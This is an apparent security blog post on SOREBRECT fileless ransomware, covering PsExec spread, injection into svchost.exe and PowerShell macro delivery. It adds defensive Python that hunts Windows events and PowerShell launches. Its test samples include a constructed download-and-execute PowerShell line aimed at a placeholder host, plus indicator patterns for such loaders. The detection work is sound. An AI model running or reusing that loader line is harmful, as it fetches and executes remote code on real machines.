Saturday 17 June 2017

SOREBRECT Ransomware: Fileless Malware Detected In The Wild

Attackers are constantly looking for new ways to evade detection. While new forms of cybercrime are on the rise, established criminal operations are shifting toward techniques that offer a wide choice of attack vectors and low detection rates. These techniques abuse legitimate operating system features to load malicious code into memory or into the registry without ever writing an executable to disk.

Security researchers first encountered SOREBRECT early this year, while monitoring the systems and networks of organizations in the Middle East. Extracting and analysing the SOREBRECT samples revealed the unusual techniques it employs to encrypt its victims' data. Unlike traditional ransomware, SOREBRECT was designed to target enterprise servers and endpoints. Attacks of this kind are known as fileless or non-malware ransomware: they leverage Microsoft's PowerShell scripting language to target organizations through documents and applications that run macros.

The researchers noticed that the SOREBRECT fileless ransomware first compromises administrator credentials (for example by brute-forcing them), then uses the Microsoft Sysinternals PsExec command-line utility to launch the encryption routine on other machines. PsExec lets the attacker run a command on a remote host without an interactive login session and without manually copying the malware across, as would be required over RDP.

SOREBRECT takes this a notch further by maliciously deploying PsExec and performing code injection. It injects its code into Windows’ svchost.exe process, while the main binary self-destructs. The combination is potent: once the deployed ransomware binary finishes execution and self-termination, the injected svchost.exe—a legitimate Windows service-hosting system process—resumes the execution of the payload (file encryption). Because SOREBRECT becomes fileless after code injection, sourcing its binary sample at the endpoint level is challenging.

SOREBRECT can also encrypt the files of other computers reachable from the infected machine over the local network. It does so by scanning the network for asset discovery and enumerating open shares: folders, content or peripherals (e.g. printers) that others can readily access over the network.
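The chain described above (PsExec on stolen admin credentials, injection into svchost.exe, share enumeration) leaves footprints in standard Windows telemetry even when the dropper has deleted itself. The following Python is an added example written for this page, not code from the original post or from the researchers who analysed SOREBRECT. It hunts for three of those footprints: System event 7045 recording the PSEXESVC service install, Sysmon events 1 and 8 for a process spawned by PSEXESVC.exe and for a remote thread created in svchost.exe, and Security event 5140 fan-out from one client address across many shares. The event records are constructed; the event IDs are the standard ones, but the hosts, addresses and the dropper name "netsvc.exe" are assumptions.

```python
"""Hunt for SOREBRECT-style tradecraft in Windows event records (added example).

Every record in EVENTS is constructed for this example. Field names follow the
System, Security and Sysmon logs, but hosts, addresses and the dropper name
"netsvc.exe" are made up.
"""
from collections import defaultdict
from pprint import pprint

PSEXEC_SERVICE = "psexesvc"
SYSTEM32 = "c:\\windows\\system32\\"
SHARE_FANOUT = 3  # distinct shares one client address must touch to be flagged

EVENTS = [
    # System 7045: service installed. PsExec drops PSEXESVC on the target first.
    {"host": "FS01", "log": "System", "event_id": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"host": "FS01", "log": "System", "event_id": 7045, "ServiceName": "gupdate",
     "ImagePath": "\"C:\\Program Files\\Google\\Update\\GoogleUpdate.exe\" /svc"},
    # Sysmon 1: process creation. The remote command runs under PSEXESVC.exe.
    {"host": "FS01", "log": "Sysmon", "event_id": 1,
     "Image": "C:\\Windows\\netsvc.exe", "ParentImage": "C:\\Windows\\PSEXESVC.exe"},
    {"host": "FS01", "log": "Sysmon", "event_id": 1,
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe"},
    # Sysmon 8: CreateRemoteThread. The dropper injects into svchost.exe.
    {"host": "FS01", "log": "Sysmon", "event_id": 8,
     "SourceImage": "C:\\Windows\\netsvc.exe",
     "TargetImage": "C:\\Windows\\System32\\svchost.exe"},
    {"host": "FS01", "log": "Sysmon", "event_id": 8,
     "SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetImage": "C:\\Windows\\System32\\svchost.exe"},
    # Security 5140: a network share object was accessed.
    {"host": "FS01", "log": "Security", "event_id": 5140,
     "IpAddress": "10.0.0.25", "ShareName": "\\\\*\\IPC$"},
    {"host": "FS01", "log": "Security", "event_id": 5140,
     "IpAddress": "10.0.0.25", "ShareName": "\\\\*\\Finance"},
    {"host": "WS07", "log": "Security", "event_id": 5140,
     "IpAddress": "10.0.0.25", "ShareName": "\\\\*\\C$"},
    {"host": "FS02", "log": "Security", "event_id": 5140,
     "IpAddress": "10.0.0.25", "ShareName": "\\\\*\\HR"},
    {"host": "FS01", "log": "Security", "event_id": 5140,
     "IpAddress": "10.0.0.40", "ShareName": "\\\\*\\Finance"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def psexec_activity(events):
    """PsExec leaves two traces on the target: the PSEXESVC service install
    (System 7045) and the remote command running as a child of PSEXESVC.exe
    (Sysmon 1)."""
    hits = []
    for e in events:
        if (e["log"] == "System" and e["event_id"] == 7045
                and PSEXEC_SERVICE in (e["ServiceName"] + e["ImagePath"]).lower()):
            hits.append((e["host"], "service installed", e["ImagePath"]))
        elif (e["log"] == "Sysmon" and e["event_id"] == 1
                and _basename(e["ParentImage"]) == "psexesvc.exe"):
            hits.append((e["host"], "spawned by PsExec", e["Image"]))
    return hits


def svchost_injection(events):
    """Sysmon 8: a thread created in svchost.exe by a process outside System32
    is the footprint of the injection step, and the durable lead once the
    dropper has removed itself from disk."""
    return [(e["host"], e["SourceImage"]) for e in events
            if e["log"] == "Sysmon" and e["event_id"] == 8
            and _basename(e["TargetImage"]) == "svchost.exe"
            and not e["SourceImage"].lower().startswith(SYSTEM32)]


def share_enumeration(events, threshold=SHARE_FANOUT):
    """Security 5140: one client address reaching many distinct shares in the
    collection window looks like discovery rather than normal use."""
    seen = defaultdict(set)
    for e in events:
        if e["log"] == "Security" and e["event_id"] == 5140:
            seen[e["IpAddress"]].add((e["host"], e["ShareName"]))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= threshold}


def hunt(events):
    return {"psexec": psexec_activity(events),
            "svchost_injection": svchost_injection(events),
            "share_enumeration": share_enumeration(events)}


if __name__ == "__main__":
    pprint(hunt(EVENTS))
```

The share fan-out threshold is deliberately low for the constructed sample; in production it should be tuned against a baseline, and legitimate admin tooling that also uses PsExec should be allow-listed by account and source host rather than by suppressing the 7045 indicator altogether.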

How does fileless ransomware work with PowerShell?
Non-malware, or fileless, ransomware differs from traditional ransomware in that it does not drop an encryptor executable on disk. Instead, a document macro or a script launches PowerShell, which loads and runs the encryption routine entirely in memory.

What are the two ways fileless ransomware can penetrate your systems?
Via phishing attacks: a user opens an attached document and enables its macros. The macro launches PowerShell with a script that runs directly in the device's memory (tablet, laptop, cellphone or desktop), encrypts the data and then displays the payment demand.

Via compromised websites: an employee browses to a compromised or malicious website whose scripts load the payload straight into the computer's RAM, harvest pertinent information and then either demand cryptocurrency or immediately encrypt the files.

Why is fileless ransomware unique?
Fileless malware is difficult to detect because the malicious code lives in a native scripting language or is written straight into the computer's RAM. It is never written to disk, so it does not rely on the hard drive to run its commands, and file-based scanning has nothing to inspect.
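Because nothing lands on disk, the place to look is the launch of PowerShell itself: who its parent was and what it was told to run. The following Python is an added example written for this page (not code from the original post) that triages process-creation records the way a detection engineer would: it flags PowerShell spawned by an Office application (the macro path above) or a browser (the compromised-website path), decodes any -EncodedCommand argument (PowerShell expects UTF-16LE text, base64 encoded) and then looks for the usual download-and-execute-in-memory indicators in both the raw command line and the decoded script. The process records and command lines are constructed; the indicator list is a hunting heuristic, not a definitive signature.

```python
"""Triage PowerShell launches for the fileless macro/browser pattern (added example).

The records in SAMPLES are constructed; parent paths, command lines and the
URL example.invalid are made up. encode_command() exists only to build the
encoded sample the same way PowerShell would expect it.
"""
import base64
import binascii
import re

# Parents that should rarely launch PowerShell on a workstation.
MACRO_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe"}

# Substrings typical of scripts that fetch and run a payload without touching disk.
INDICATORS = [
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", "remote payload fetch"),
    (r"frombase64string", "embedded base64 stage"),
    (r"\[reflection\.assembly\]::load", "reflective assembly load"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-nop\b|-noprofile", "profile bypass"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
]


def encode_command(script):
    """-EncodedCommand takes the script as UTF-16LE text, base64 encoded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand
    (or any prefix abbreviation PowerShell accepts: -e, -ec, -enc, ...),
    else None. Malformed base64 or odd-length UTF-16 also yields None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if tok[0] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def triage(record):
    """record: {'parent': path, 'image': path, 'cmdline': str}. Returns the
    list of reasons the launch deserves a look; an empty list means no finding."""
    reasons = []
    image = record["image"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return reasons
    parent = record["parent"].rsplit("\\", 1)[-1].lower()
    if parent in MACRO_HOSTS:
        reasons.append(f"Office process {parent} spawned PowerShell (macro)")
    elif parent in BROWSERS:
        reasons.append(f"browser {parent} spawned PowerShell")
    script = decode_encoded_command(record["cmdline"])
    text = record["cmdline"]
    if script is not None:
        reasons.append("encoded command decoded")
        text += "\n" + script          # scan the decoded script as well
    for pattern, label in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            reasons.append(label)
    return reasons


# Constructed samples: one macro-launched encoded downloader, one benign
# scheduled script, one browser-launched reflective loader.
MACRO_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
PS_PATH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLES = [
    {"parent": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
     "image": PS_PATH,
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(MACRO_SCRIPT)},
    {"parent": "C:\\Windows\\explorer.exe", "image": PS_PATH,
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"parent": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "image": PS_PATH,
     "cmdline": 'powershell.exe -ep bypass -c "[Reflection.Assembly]::Load([Convert]::FromBase64String($s))"'},
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(rec["cmdline"][:60], "->", triage(rec) or "no finding")
```

Decoding the argument before matching is what makes this useful: the indicators would never match the base64 blob itself, which is exactly why attackers encode it. Turning on PowerShell script block logging gives the same visibility after the fact, but the process-creation record is available even on hosts where that logging was never enabled.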

What are the problems associated with fileless ransomware?
  • Fileless ransomware leaves little trace behind and evades antivirus products that rely on scanning files on disk.
  • This strain gives cyber criminals access to your systems: they can move through your computers, steal information and encrypt files without your IT staff noticing.
  • It can lead to further attacks. While their scripts run, the criminals also gather as much data from the victim's computer as possible.
What can end users do to protect themselves?

Since the ransomware targets organizations rather than individuals, sysadmins and information security professionals can protect themselves by:
  1. Backing up your data, and keeping copies offline where an encryptor cannot reach them over a network share.
  2. Blocking phishing emails and known-malicious pages at the mail gateway, web proxy and endpoint.
  3. Keeping systems updated.
  4. Restricting user write permissions, particularly on network shares, since SOREBRECT encrypts whatever the compromised account can write to.
  5. Restricting administrative credentials and remote-execution tools such as PsExec to the accounts and hosts that need them, and monitoring their use.
  6. Staying vigilant and running regular cyber security awareness sessions.

Humans are often the weakest defensive link, and this type of attack relies heavily on that vulnerability.
